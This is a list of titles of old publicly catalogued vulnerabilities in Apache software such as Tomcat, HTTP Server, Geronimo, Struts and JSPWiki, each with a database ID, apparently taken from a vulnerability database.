| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
| [58770] Apache JSPWiki Group.jsp group Parameter XSS
| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58763] Apache JSPWiki Include Tag Multiple Script XSS
| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
| [58755] Apache Harmony DRLVM Non-public Class Member Access
| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
| [58725] Apache Tapestry Basic String ACL Bypass Weakness
| [58724] Apache Roller Logout Functionality Failure Session Persistence
| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
| [58687] Apache Axis Invalid wsdl Request XSS
| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
| [58685] Apache Velocity Template Designer Privileged Code Execution
| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
| [58667] Apache Roller Database Cleartext Passwords Disclosure
| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
| [56984] Apache Xerces2 Java Malformed XML Input DoS
| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
| [55056] Apache Tomcat Cross-application TLD File Manipulation
| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
| [54589] Apache Jserv Nonexistent JSP Request XSS
| [54122] Apache Struts s:a / s:url Tag href Element XSS
| [54093] Apache ActiveMQ Web Console JMS Message XSS
| [53932] Apache Geronimo Multiple Admin Function CSRF
| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
| [53930] Apache Geronimo /console/portal/ URI XSS
| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
| [53380] Apache Struts Unspecified XSS
| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
| [51151] Apache Roller Search Function q Parameter XSS
| [50482] PHP with Apache php_value Order Unspecified Issue
| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
| [47096] Oracle Weblogic Apache Connector POST Request Overflow
| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
| [43452] Apache Tomcat HTTP Request Smuggling
| [43309] Apache Geronimo LoginModule Login Method Bypass
| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
| [42091] Apache Maven Site Plugin Installation Permission Weakness
| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
| [40262] Apache HTTP Server mod_status refresh XSS
| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
| [36080] Apache Tomcat JSP Examples Crafted URI XSS
| [36079] Apache Tomcat Manager Uploaded Filename XSS
| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
| [34881] Apache Tomcat Malformed Accept-Language Header XSS
| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
| [32724] Apache mod_python _filter_read Freed Memory Disclosure
| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
| [24365] Apache Struts Multiple Function Error Message XSS
| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
| [22459] Apache Geronimo Error Page XSS
| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
| [21021] Apache Struts Error Message XSS
| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
| [20439] Apache Tomcat Directory Listing Saturation DoS
| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
| [20285] Apache HTTP Server Log File Control Character Injection
| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
| [19821] Apache Tomcat Malformed Post Request Information Disclosure
| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
| [18233] Apache HTTP Server htdigest user Variable Overfow
| [17738] Apache HTTP Server HTTP Request Smuggling
| [16586] Apache HTTP Server Win32 GET Overflow DoS
| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
| [13304] Apache Tomcat realPath.jsp Path Disclosure
| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
| [12848] Apache HTTP Server htdigest realm Variable Overflow
| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
| [12557] Apache HTTP Server prefork MPM accept Error DoS
| [12233] Apache Tomcat MS-DOS Device Name Request DoS
| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
| [12231] Apache Tomcat web.xml Arbitrary File Access
| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
| [12178] Apache Jakarta Lucene results.jsp XSS
| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
| [10471] Apache Xerces-C++ XML Parser DoS
| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
| [10068] Apache HTTP Server htpasswd Local Overflow
12365| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
12366| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
12367| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
12368| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
12369| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
12370| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
12371| [9717] Apache HTTP Server mod_cookies Cookie Overflow
12372| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
12373| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
12374| [9714] Apache Authentication Module Threaded MPM DoS
12375| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
12376| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
12377| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
12378| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
12379| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
12380| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
12381| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
12382| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
12383| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
12384| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
12385| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
12386| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
12387| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
12388| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
12389| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
12390| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
12391| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
12392| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
12393| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
12394| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
12395| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
12396| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
12397| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
12398| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
12399| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
12400| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
12401| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
12402| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
12403| [9208] Apache Tomcat .jsp Encoded Newline XSS
12404| [9204] Apache Tomcat ROOT Application XSS
12405| [9203] Apache Tomcat examples Application XSS
12406| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
12407| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
12408| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
12409| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
12410| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
12411| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
12412| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
12413| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
12414| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
12415| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
12416| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
